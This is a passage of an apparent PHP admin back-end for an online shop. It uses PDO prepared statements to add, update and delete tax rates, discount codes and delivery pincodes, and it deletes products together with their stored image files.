    $tax_rate = !empty($_POST['tax_rate']) ? floatval($_POST['tax_rate']) : 0.00;
    $status   = !empty($_POST['status']) ? $_POST['status'] : 'active';

    $stmt = $pdo->prepare("INSERT INTO `taxes` (`tax_name`, `tax_rate`, `status`) 
                           VALUES (:tax_name, :tax_rate, :status)");
    $stmt->execute([
        'tax_name' => $tax_name,
        'tax_rate' => $tax_rate,
        'status'   => $status
    ]);

    header("Location: tax.php");
    exit();
}

//----------------------------------------------------------
// Update Tax
//----------------------------------------------------------
if (isset($_POST['update_tax'])) {
    $tax_id   = intval($_POST['tax_id']);
    $tax_name = !empty($_POST['tax_name']) ? htmlspecialchars(trim($_POST['tax_name'])) : "";
    $tax_rate = !empty($_POST['tax_rate']) ? floatval($_POST['tax_rate']) : 0.00;
    $status   = !empty($_POST['status']) ? $_POST['status'] : 'active';

    $stmt = $pdo->prepare("UPDATE `taxes` 
                           SET `tax_name` = :tax_name, 
                               `tax_rate` = :tax_rate, 
                               `status` = :status 
                           WHERE `tax_id` = :tax_id");
    $stmt->execute([
        'tax_name' => $tax_name,
        'tax_rate' => $tax_rate,
        'status'   => $status,
        'tax_id'   => $tax_id
    ]);

    header("Location: tax.php");
    exit();
}

//----------------------------------------------------------
// Delete Tax
//----------------------------------------------------------
if (isset($_GET['action']) && $_GET['action'] == 'delete_tax') {
    $tax_id = intval($_GET['tax_id']);

    $stmt = $pdo->prepare("DELETE FROM `taxes` WHERE `tax_id` = :tax_id");
    $stmt->execute(['tax_id' => $tax_id]);

    header("Location: tax.php");
    exit();
}




//----------------------------------------------------------
// Add Discount
//----------------------------------------------------------
if (isset($_POST['add_discount'])) {
    $code            = !empty($_POST['code']) ? strtoupper(trim($_POST['code'])) : "";
    $description     = !empty($_POST['description']) ? htmlspecialchars(trim($_POST['description'])) : null;
    $discount_type   = !empty($_POST['discount_type']) ? $_POST['discount_type'] : "fixed";
    $discount_value  = !empty($_POST['discount_value']) ? floatval($_POST['discount_value']) : 0.00;
    $min_order_value = !empty($_POST['min_order_value']) ? floatval($_POST['min_order_value']) : 0.00;
    $max_discount    = !empty($_POST['max_discount']) ? floatval($_POST['max_discount']) : null;
    $usage_limit     = !empty($_POST['usage_limit']) ? intval($_POST['usage_limit']) : null;
    $start_date      = !empty($_POST['start_date']) ? $_POST['start_date'] : date("Y-m-d");
    $end_date        = !empty($_POST['end_date']) ? $_POST['end_date'] : date("Y-m-d");
    $status          = !empty($_POST['status']) ? $_POST['status'] : 'active';

    $stmt = $pdo->prepare("INSERT INTO `discounts` 
        (`code`, `description`, `discount_type`, `discount_value`, `min_order_value`, `max_discount`, `usage_limit`, `start_date`, `end_date`, `status`) 
        VALUES 
        (:code, :description, :discount_type, :discount_value, :min_order_value, :max_discount, :usage_limit, :start_date, :end_date, :status)");

    $stmt->execute([
        'code'            => $code,
        'description'     => $description,
        'discount_type'   => $discount_type,
        'discount_value'  => $discount_value,
        'min_order_value' => $min_order_value,
        'max_discount'    => $max_discount,
        'usage_limit'     => $usage_limit,
        'start_date'      => $start_date,
        'end_date'        => $end_date,
        'status'          => $status
    ]);

    header("Location: discount.php");
    exit();
}

//----------------------------------------------------------
// Update Discount
//----------------------------------------------------------
if (isset($_POST['update_discount'])) {
    $discount_id     = intval($_POST['discount_id']);
    $code            = !empty($_POST['code']) ? strtoupper(trim($_POST['code'])) : "";
    $description     = !empty($_POST['description']) ? htmlspecialchars(trim($_POST['description'])) : null;
    $discount_type   = !empty($_POST['discount_type']) ? $_POST['discount_type'] : "fixed";
    $discount_value  = !empty($_POST['discount_value']) ? floatval($_POST['discount_value']) : 0.00;
    $min_order_value = !empty($_POST['min_order_value']) ? floatval($_POST['min_order_value']) : 0.00;
    $max_discount    = !empty($_POST['max_discount']) ? floatval($_POST['max_discount']) : null;
    $usage_limit     = !empty($_POST['usage_limit']) ? intval($_POST['usage_limit']) : null;
    $start_date      = !empty($_POST['start_date']) ? $_POST['start_date'] : date("Y-m-d");
    $end_date        = !empty($_POST['end_date']) ? $_POST['end_date'] : date("Y-m-d");
    $status          = !empty($_POST['status']) ? $_POST['status'] : 'active';

    $stmt = $pdo->prepare("UPDATE `discounts` 
        SET `code` = :code, 
            `description` = :description, 
            `discount_type` = :discount_type, 
            `discount_value` = :discount_value, 
            `min_order_value` = :min_order_value, 
            `max_discount` = :max_discount, 
            `usage_limit` = :usage_limit, 
            `start_date` = :start_date, 
            `end_date` = :end_date, 
            `status` = :status 
        WHERE `discount_id` = :discount_id");

    $stmt->execute([
        'code'            => $code,
        'description'     => $description,
        'discount_type'   => $discount_type,
        'discount_value'  => $discount_value,
        'min_order_value' => $min_order_value,
        'max_discount'    => $max_discount,
        'usage_limit'     => $usage_limit,
        'start_date'      => $start_date,
        'end_date'        => $end_date,
        'status'          => $status,
        'discount_id'     => $discount_id
    ]);

    header("Location: discount.php");
    exit();
}

//----------------------------------------------------------
// Delete Discount
//----------------------------------------------------------
if (isset($_GET['action']) && $_GET['action'] == 'delete_discount') {
    $discount_id = intval($_GET['discount_id']);

    $stmt = $pdo->prepare("DELETE FROM `discounts` WHERE `discount_id` = :discount_id");
    $stmt->execute(['discount_id' => $discount_id]);

    header("Location: discount.php");
    exit();
}


//----------------------------------------------------------
// Add Pincode
//----------------------------------------------------------
if (isset($_POST['add_pincode'])) {
    $pincode        = !empty($_POST['pincode']) ? trim($_POST['pincode']) : "";
    $city           = !empty($_POST['city']) ? htmlspecialchars(trim($_POST['city'])) : "";
    $state          = !empty($_POST['state']) ? htmlspecialchars(trim($_POST['state'])) : "";
    $shipping_price = !empty($_POST['shipping_price']) ? floatval($_POST['shipping_price']) : 0.00;
    $cod_available  = !empty($_POST['cod_available']) ? $_POST['cod_available'] : "yes";
    $delivery_days  = !empty($_POST['delivery_days']) ? intval($_POST['delivery_days']) : 3;
    $status         = !empty($_POST['status']) ? $_POST['status'] : "active";

    $stmt = $pdo->prepare("INSERT INTO `pincodes` 
        (`pincode`, `city`, `state`, `shipping_price`, `cod_available`, `delivery_days`, `status`) 
        VALUES 
        (:pincode, :city, :state, :shipping_price, :cod_available, :delivery_days, :status)");

    $stmt->execute([
        'pincode'        => $pincode,
        'city'           => $city,
        'state'          => $state,
        'shipping_price' => $shipping_price,
        'cod_available'  => $cod_available,
        'delivery_days'  => $delivery_days,
        'status'         => $status
    ]);

    header("Location: pincodes.php");
    exit();
}

//----------------------------------------------------------
// Update Pincode
//----------------------------------------------------------
if (isset($_POST['update_pincode'])) {
    $pincode_id     = intval($_POST['pincode_id']);
    $pincode        = !empty($_POST['pincode']) ? trim($_POST['pincode']) : "";
    $city           = !empty($_POST['city']) ? htmlspecialchars(trim($_POST['city'])) : "";
    $state          = !empty($_POST['state']) ? htmlspecialchars(trim($_POST['state'])) : "";
    $shipping_price = !empty($_POST['shipping_price']) ? floatval($_POST['shipping_price']) : 0.00;
    $cod_available  = !empty($_POST['cod_available']) ? $_POST['cod_available'] : "yes";
    $delivery_days  = !empty($_POST['delivery_days']) ? intval($_POST['delivery_days']) : 3;
    $status         = !empty($_POST['status']) ? $_POST['status'] : "active";

    $stmt = $pdo->prepare("UPDATE `pincodes` 
        SET `pincode` = :pincode, 
            `city` = :city, 
            `state` = :state, 
            `shipping_price` = :shipping_price, 
            `cod_available` = :cod_available, 
            `delivery_days` = :delivery_days, 
            `status` = :status 
        WHERE `pincode_id` = :pincode_id");

    $stmt->execute([
        'pincode'        => $pincode,
        'city'           => $city,
        'state'          => $state,
        'shipping_price' => $shipping_price,
        'cod_available'  => $cod_available,
        'delivery_days'  => $delivery_days,
        'status'         => $status,
        'pincode_id'     => $pincode_id
    ]);

    header("Location: pincodes.php");
    exit();
}

//----------------------------------------------------------
// Delete Pincode
//----------------------------------------------------------
if (isset($_GET['action']) && $_GET['action'] == 'delete_pincode') {
    $pincode_id = intval($_GET['pincode_id']);

    $stmt = $pdo->prepare("DELETE FROM `pincodes` WHERE `pincode_id` = :pincode_id");
    $stmt->execute(['pincode_id' => $pincode_id]);

    header("Location: pincodes.php");
    exit();
}





//----------------------------------------------------------
// Delete product
//----------------------------------------------------------
if (isset($_GET['action']) && $_GET['action'] == 'delete_product') {
    $id = intval($_GET['id']);

    // Fetch product images
    $stmt = $pdo->prepare("SELECT `thumbnail_image`, `product_images` FROM `products` WHERE `product_id` = :id");
    $stmt->execute(['id' => $id]);
    $product = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($product) {
        // Delete thumbnail image
        if (!empty($product['thumbnail_image']) && file_exists("../" . $product['thumbnail_image'])) {
            unlink("../" . $product['thumbnail_image']);
        }

        // Delete multiple product images (JSON array)
        if (!empty($product['product_images'])) {
            $images = json_decode($product['product_images'], true);
            if (is_array($images)) {
                foreach ($images as $img) {
                    if (file_exists("../" . $img)) {
                        unlink("../" . $img);
                    }
                }
            }
        }

        // Delete product record from database
        $stmt = $pdo->prepare("DELETE FROM `products` WHERE `product_id` = :id");
        $stmt->execute(['id' => $id]);
    }

    // Redirect back to products page
    header("Location: product.php");
    exit();
}

?>

........